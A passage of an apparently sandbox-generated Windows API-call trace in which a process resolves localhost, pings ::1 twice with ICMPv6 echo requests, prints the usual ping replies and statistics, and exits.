lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x1ef5a0, lpData=0x1ef5a8, lpcbData=0x1ef5a4*=0x4 | out: lpType=0x1ef5a0*=0x0, lpData=0x1ef5a8*=0x0, lpcbData=0x1ef5a4*=0x4) returned 0x2 [0161.140] RegCloseKey (hKey=0x7c) returned 0x0 [0161.141] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x1ef574*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1ef59c | out: ppResult=0x1ef59c*=0x0) returned 11001 [0161.141] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x1ef574*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1ef59c | out: ppResult=0x1ef59c*=0x27b5f8*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="AUFDDCntXwT", ai_addr=0x27b6c0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x27b6e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x279150*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0163.485] FreeAddrInfoW (pAddrInfo=0x27b5f8*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="啁䑆䍄瑮睘T", ai_addr=0x27b6c0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x27b6e8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x279150*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0163.485] Icmp6CreateFile () returned 0x27fb48 [0163.580] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x27b738 [0163.580] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x285c00 [0163.580] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1efa9c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0163.580] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x1ef59c, nSize=0x0, Arguments=0x1ef598 | out: lpBuffer="`·'") returned 0x1c [0163.602] CharToOemBuffA (in: lpszSrc="\r\nPinging AUFDDCntXwT [::1] ", lpszDst=0x27b760, cchDstLength=0x1c | out: lpszDst="\r\nPinging AUFDDCntXwT [::1] ") returned 1 [0163.602] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.602] _write (in: _FileHandle=1, _Buf=0x27b760*, _MaxCharCount=0x1c | out: _Buf=0x27b760*) returned 28 [0163.602] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.603] LocalFree (hMem=0x27b760) returned 0x0 [0163.603] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x1ef5a0, nSize=0x0, Arguments=0x1ef59c | out: lpBuffer="`·'") returned 0x18 [0163.603] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x27b760, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0163.603] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.603] _write (in: _FileHandle=1, _Buf=0x27b760*, _MaxCharCount=0x18 | out: _Buf=0x27b760*) returned 24 [0163.603] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.603] LocalFree (hMem=0x27b760) returned 0x0 [0163.604] SetConsoleCtrlHandler (HandlerRoutine=0xcf17ca, Add=1) returned 1 [0163.604] Icmp6SendEcho2 (in: IcmpHandle=0x27fb48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x1ef618, DestinationAddress=0xcf55e0, RequestData=0x27b738, RequestSize=0x20, RequestOptions=0x1ef5c8, ReplyBuffer=0x285c00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x285c00) returned 0x1 [0163.671] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1efa9c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0163.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef5a0, nSize=0x0, Arguments=0x1ef59c | out: lpBuffer="`À'") returned 0x10 [0163.672] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x27c060, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0163.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.672] _write (in: _FileHandle=1, _Buf=0x27c060*, _MaxCharCount=0x10 | out: _Buf=0x27c060*) returned 16 [0163.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.672] LocalFree (hMem=0x27c060) returned 0x0 [0163.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="H\x93'") returned 0x9 [0163.672] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x279348, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0163.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.672] _write (in: _FileHandle=1, _Buf=0x279348*, _MaxCharCount=0x9 | out: _Buf=0x279348*) returned 9 [0163.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.672] LocalFree (hMem=0x279348) returned 0x0 [0163.672] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="(ÿ'") returned 0x2 [0163.672] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x27ff28, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0163.672] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0163.672] _write (in: _FileHandle=1, _Buf=0x27ff28*, _MaxCharCount=0x2 | out: _Buf=0x27ff28*) returned 2 [0163.672] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0163.672] LocalFree (hMem=0x27ff28) returned 0x0 [0163.672] Sleep (dwMilliseconds=0x3e8) [0164.685] Icmp6SendEcho2 (in: IcmpHandle=0x27fb48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x1ef618, DestinationAddress=0xcf55e0, RequestData=0x27b738, RequestSize=0x20, RequestOptions=0x1ef5c8, ReplyBuffer=0x285c00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x285c00) returned 0x1 [0164.779] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1efa9c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0164.779] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x1ef5a0, nSize=0x0, Arguments=0x1ef59c | out: lpBuffer="`À'") returned 0x10 [0164.779] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x27c060, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0164.779] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.779] _write (in: _FileHandle=1, _Buf=0x27c060*, _MaxCharCount=0x10 | out: _Buf=0x27c060*) returned 16 [0164.779] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.779] LocalFree (hMem=0x27c060) returned 0x0 [0164.779] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="H\x93'") returned 0x9 [0164.779] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x279348, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0164.779] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.779] _write (in: _FileHandle=1, _Buf=0x279348*, _MaxCharCount=0x9 | out: _Buf=0x279348*) returned 9 [0164.779] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.779] LocalFree (hMem=0x279348) returned 0x0 [0164.779] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x1ef5a4, nSize=0x0, Arguments=0x1ef5a0 | out: lpBuffer="(ÿ'") returned 0x2 [0164.779] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x27ff28, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0164.779] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.779] _write (in: _FileHandle=1, _Buf=0x27ff28*, _MaxCharCount=0x2 | out: _Buf=0x27ff28*) returned 2 [0164.780] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.780] LocalFree (hMem=0x27ff28) returned 0x0 [0164.780] getnameinfo (in: pSockaddr=0xcf55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x1ef568, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0164.780] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x1ef538, nSize=0x0, Arguments=0x1ef534 | out: lpBuffer="X}(") returned 0x56 [0164.780] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),\r\n", lpszDst=0x287d58, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),\r\n") returned 1 [0164.780] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.780] _write (in: _FileHandle=1, _Buf=0x287d58*, _MaxCharCount=0x56 | out: _Buf=0x287d58*) returned 86 [0164.780] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.780] LocalFree (hMem=0x287d58) returned 0x0 [0164.780] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x1ef548, nSize=0x0, Arguments=0x1ef544 | out: lpBuffer="p}(") returned 0x61 [0164.780] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpszDst=0x287d70, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n") returned 1 [0164.780] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0164.780] _write (in: _FileHandle=1, _Buf=0x287d70*, _MaxCharCount=0x61 | out: _Buf=0x287d70*) returned 97 [0164.780] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0164.780] LocalFree (hMem=0x287d70) returned 0x0 [0164.780] IcmpCloseHandle (IcmpHandle=0x27fb48) returned 1 [0164.872] LocalFree (hMem=0x27b738) returned 0x0 [0164.872] LocalFree (hMem=0x285c00) returned 0x0 [0164.873] WSACleanup () returned 0 [0164.953] exit (_Code=0) Thread: id = 63 os_tid = 0x418 Thread: id = 64 os_tid = 0x804 Thread: id = 65 os_tid = 0x814